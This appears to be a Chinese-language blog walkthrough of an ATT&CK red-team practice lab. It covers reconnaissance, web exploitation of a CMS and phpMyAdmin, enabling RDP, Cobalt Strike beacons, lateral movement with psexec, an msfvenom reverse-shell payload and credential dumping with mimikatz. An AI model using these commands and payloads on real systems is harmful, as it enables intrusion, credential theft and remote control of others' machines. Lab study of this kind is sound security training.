文章目录
前言
靶机下载地址:ATT&CK红队评估实战靶场
拓扑图:
通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。
环境搭建
| 名字 | host | passwd | 说明 |
|---|---|---|---|
| windos7 | 192.168.93.160/24 192.168.142.128/24 | hongrisec@2019 | web服务器 |
| win2K2 | 192.168.142.129/24 | hongrisec@2020 | 域成员 |
| windows server 2008 r2 | 192.168.142.130/24 | hongrisec@2020 | 域控制器 |
| kali | 192.168.93.129/24 | kali | attack |
测试网络连通性
windows7 ping win2k2 、 windows server 2012
这里win2k2互相ping
kali机与WEB联通
这里因为win7开了防火墙ping不通。
攻入内网
信息收集
探测同网段主机存活
nmap -sT 192.168.93.160
探测端口
nmap -sT 192.168.68.160
操作系统、版本
nmap –T4 –A
利用可用端口
经过前面的扫描发现80端口开启这里我们直接访问。
这里发现一个php探针,好家伙基本信息都在这里了,还要扫描信息收集吗?
但是看了一眼发现还是没有网站目录,这里直接用工具扫描,这里用的工具是dirsearch
./dirsearch.py -u 192.168.93.160 e*
漏洞一_信息泄露+弱口令
漏洞二_存储型XSS
需要后台审核,用来获取管理员cookie。
漏洞三_任意修改文件
蚂蚁剑直接连接
漏洞四_phpadmin文件写入
通过 phpmyadmin getshell参考链接
然后这里探针这里暴露了绝对路径。
然后直接根据上面那篇文章,getshell。
远程连接
这是在win7上进行的,根本没有打进win7的内网。利用蚁剑终端,查看开启端口,并给win7添加用户,之后要用3389远程连接桌面:
这里没有开启端口,我们直接百度一下。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
接下来创建用户,把用户加入管理员组获得权限。
先关一下防火墙
参考文章:内网渗透学习导航
域信息收集
一、什么是域
域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个*计算机集群上的*数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从Windows Server 2003开始 , Active Directory是负责维护该*数据库的Windows组件。Windows域的概念与工作组的概念形成对比,在该工作组中,每台计算机都维护自己的安全主体数据库。
kali先启动cs
启动服务端
启动客户端
在Attacks->packags下的windows executable(s)选择监听,创建个木马
生成一个txt文件在主机powershell里运行
成功上线
判断是否存在域
使用 ipconfig /all 查看 DNS 服务器:
shell ipconfig /all
发现 DNS 服务器名为 god.org,查看域信息:net view
shell net view
查看主域信息:net view /domain
shell net view /domain
查询当前的登录域与用户信息:net config workstation
可以很清楚看出有无域。
使用 dump hash模块导出散列值,获取凭据 (access->dump hashs)
使用logonpasswords模块,调用内置在CS中的mimikatz将内存中的lsass.exe进程保存的用户明文密码和散列导出
横向移动
接下来就是横向移动,但是由于内网机是无法直接和外网连接的,这将win7当成跳板机。
官网介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。
因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
首先新建一个监听
然后使用之前获取的主机信息和凭据,使用psexec模块进行登入。
成功上线
MSF反弹shell
参考文章:链接
植入windows后门:
>payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
在msfconsole中进行配置
windows7执行
下面我们就该去杀入域控了,杀入域之前我们先来做一些基础的信息收集,毕竟大佬说过渗透测试的本质是信息收集…
ipconfig /all 查询本机IP段,所在域等
net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user 本机用户列表
net localhroup administrators 本机管理员[通常含有域用户]
net user /domain 查询域用户
net user 用户名 /domain 获取指定用户的账户信息
net user /domain b404 pass 修改域内用户密码,需要管理员权限
net group /domain 查询域里面的工作组
net group 组名 /domain 查询域中的某工作组
net group “domain admins” /domain 查询域管理员列表
net group “domain controllers” /domain 查看域控制器(如果有多台)
net time /domain 判断主域,主域服务器都做时间服务器
ipconfig /all 查询本机IP段,所在域等
在本环境中我们是没有办法直接抓取明文的,当然也有办法绕过就是自己上传一个mimitakz使用debug进行明文抓取
我们先把mimitakz(实战中需要免杀处理)上传上去:
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe C:\phpStudy\WWW\yxcms
参考文章:神器mimikatz使用命令方法总结
提升权限
privilege::debug
抓取明文密码:
sekurlsa::logonpasswords